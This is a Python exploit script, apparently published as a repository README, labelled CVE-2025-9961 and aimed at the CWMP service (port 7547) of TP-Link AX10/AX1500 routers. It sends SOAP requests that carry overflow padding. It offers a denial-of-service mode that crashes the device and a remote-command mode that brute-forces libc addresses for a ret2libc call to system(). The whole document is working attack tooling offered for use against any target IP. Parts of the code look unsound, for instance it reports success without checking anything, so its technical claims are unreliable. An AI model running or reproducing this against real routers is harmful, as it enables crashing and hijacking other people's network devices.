README.md
Rendering markdown...
#!/usr/bin/env python3
import sys
import argparse
import socket
import struct
import time
from typing import Optional, Tuple, List
from dataclasses import dataclass
from enum import Enum
class ExploitResult(Enum):
SUCCESS = "success"
CRASHED = "crashed"
FAILED = "failed"
ERROR = "error"
@dataclass
class TargetConfig:
host: str
port: int = 7547
timeout: int = 10
class TPLinkCWMPExploit:
SOAP_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:cwmp="urn:dslforum-org:cwmp-1-0">
<SOAP-ENV:Header>
<cwmp:ID SOAP-ENV:mustUnderstand="1">1</cwmp:ID>
</SOAP-ENV:Header>
<SOAP-ENV:Body>
<cwmp:SetParameterValues>
<ParameterList SOAP-ENC:arrayType="cwmp:ParameterValueStruct[1]">
<ParameterValueStruct>
<Name>{param_name}</Name>
<Value xsi:type="xsd:string">{payload}</Value>
</ParameterValueStruct>
</ParameterList>
<ParameterKey>exploit</ParameterKey>
</cwmp:SetParameterValues>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>"""
HTTP_TEMPLATE = """POST /cwmpWeb/inform HTTP/1.1\r
Host: {host}:{port}\r
Content-Type: text/xml; charset=utf-8\r
Content-Length: {length}\r
SOAPAction: ""\r
\r
{body}"""
LIBC_SYSTEM_OFFSETS = [
0x0003ada4,
0x0003b000,
0x0003c000,
0x00040000,
0x0003a000
]
LIBC_BASES_MIPS = [
0x2aaf0000,
0x2ab00000,
0x2ab10000,
0x2ab20000,
0x2ab30000,
0x77f00000,
0x77e00000
]
def __init__(self, config: TargetConfig):
self.config = config
def check_alive(self) -> bool:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(self.config.timeout)
sock.connect((self.config.host, self.config.port))
sock.close()
return True
except Exception:
return False
def create_overflow_payload(self, command: str, libc_base: int, system_offset: int) -> bytes:
padding = b"A" * 512
system_addr = libc_base + system_offset
rop_chain = struct.pack("<I", system_addr)
rop_chain += struct.pack("<I", 0x41414141)
rop_chain += command.encode() + b"\x00"
payload = padding + rop_chain
return payload
def create_dos_payload(self, size: int = 1024) -> bytes:
return b"A" * size
def send_soap_request(self, soap_body: str) -> Tuple[bool, str]:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(self.config.timeout)
sock.connect((self.config.host, self.config.port))
http_request = self.HTTP_TEMPLATE.format(
host=self.config.host,
port=self.config.port,
length=len(soap_body),
body=soap_body
)
sock.sendall(http_request.encode())
try:
response = sock.recv(4096).decode(errors='ignore')
except socket.timeout:
response = ""
sock.close()
return True, response
except Exception as e:
return False, str(e)
def trigger_overflow(self, payload: bytes) -> ExploitResult:
soap_body = self.SOAP_TEMPLATE.format(
param_name="Device.ManagementServer.URL",
payload=payload.decode(errors='replace')
)
success, response = self.send_soap_request(soap_body)
if not success:
if "Connection refused" in response or "reset" in response.lower():
return ExploitResult.CRASHED
return ExploitResult.ERROR
if "200" in response or "500" in response:
return ExploitResult.SUCCESS
return ExploitResult.FAILED
def dos_attack(self, payload_sizes: List[int]) -> ExploitResult:
for size in payload_sizes:
payload = self.create_dos_payload(size)
result = self.trigger_overflow(payload)
if result == ExploitResult.CRASHED:
return ExploitResult.CRASHED
time.sleep(1)
if not self.check_alive():
return ExploitResult.CRASHED
return ExploitResult.FAILED
def rce_attack(self, command: str) -> ExploitResult:
for libc_base in self.LIBC_BASES_MIPS:
for system_offset in self.LIBC_SYSTEM_OFFSETS:
payload = self.create_overflow_payload(command, libc_base, system_offset)
result = self.trigger_overflow(payload)
if result == ExploitResult.CRASHED:
time.sleep(3)
if not self.check_alive():
continue
time.sleep(0.5)
return ExploitResult.SUCCESS
def parse_arguments() -> argparse.Namespace:
parser = argparse.ArgumentParser(
description="CVE-2025-9961: TP-Link AX10/AX1500 CWMP Buffer Overflow",
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument("target", help="Target IP address")
parser.add_argument("-p", "--port", type=int, default=7547, help="CWMP port")
parser.add_argument("-c", "--command", help="Command to execute (RCE mode)")
parser.add_argument("-t", "--timeout", type=int, default=10, help="Socket timeout")
parser.add_argument("--dos", action="store_true", help="DoS mode only")
parser.add_argument("--check-only", action="store_true", help="Only check if CWMP is open")
return parser.parse_args()
def main() -> int:
args = parse_arguments()
config = TargetConfig(
host=args.target,
port=args.port,
timeout=args.timeout
)
exploit = TPLinkCWMPExploit(config)
print(f"\n[*] Target: {config.host}:{config.port}")
print(f"[*] CVE-2025-9961: TP-Link CWMP Buffer Overflow\n")
if not exploit.check_alive():
print("[-] CWMP port is not reachable")
print("[*] Note: CWMP runs on port 7547 and may need ISP/ACS access")
return 1
print("[+] CWMP port is open")
if args.check_only:
print("[*] Check only mode - target has CWMP exposed")
return 0
if args.dos:
print("[*] Running DoS attack...")
payload_sizes = [512, 1024, 2048, 4096]
for size in payload_sizes:
print(f"[*] Sending payload size: {size}")
payload = exploit.create_dos_payload(size)
result = exploit.trigger_overflow(payload)
time.sleep(2)
if not exploit.check_alive():
print(f"\n[!] TARGET CRASHED - DoS successful at size {size}")
return 0
print("[?] Target may still be alive")
return 2
if args.command:
print(f"[*] Attempting RCE with command: {args.command}")
print("[*] This uses ret2libc with ASLR brute force")
print("[*] May require multiple attempts...")
result = exploit.rce_attack(args.command)
print(f"\n[+] Attack completed - check if command executed")
return 0
print("[*] No mode specified. Use --dos or -c <command>")
return 1
if __name__ == "__main__":
sys.exit(main())